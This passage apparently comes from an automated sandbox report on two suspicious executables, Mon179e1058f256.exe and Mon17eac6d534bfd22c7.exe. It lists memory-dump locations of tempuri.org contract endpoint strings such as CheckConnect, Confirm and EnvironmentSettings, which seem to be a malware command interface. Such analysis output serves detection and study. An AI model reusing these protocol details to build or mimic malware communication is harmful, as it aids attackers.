0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/ICont8
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContD
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContH
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/$
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/0
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnect
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/Confirm
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettings
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsResponseH9
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtendV
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 